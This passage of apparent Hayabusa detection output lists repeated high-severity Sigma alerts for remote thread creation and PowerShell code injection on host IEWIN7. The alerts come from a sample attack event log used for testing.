Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
